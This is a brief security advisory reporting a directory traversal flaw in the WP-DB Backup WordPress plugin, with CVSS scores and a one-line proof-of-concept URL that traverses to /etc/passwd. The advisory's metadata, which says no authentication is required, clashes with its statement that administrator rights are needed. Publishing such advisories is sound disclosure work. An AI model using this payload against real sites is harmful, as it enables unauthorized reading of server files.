Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability

Credit: ss_team
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Hi all, Software: WP-DB Backup Plugin for Wordpress Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ Description: WP-DB Backup is vulnerable to directory traversal attack. You must have administrator rights in the wordpress blog to exploit this vulnerability. PoC: http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup= ../../../../../etc/passwd Credits: marc & shb from ssteam are credited with discoverying this vulnerability. Vendor: not contacted. -- Coolest IT security blog: http://ssteam.ath.cx

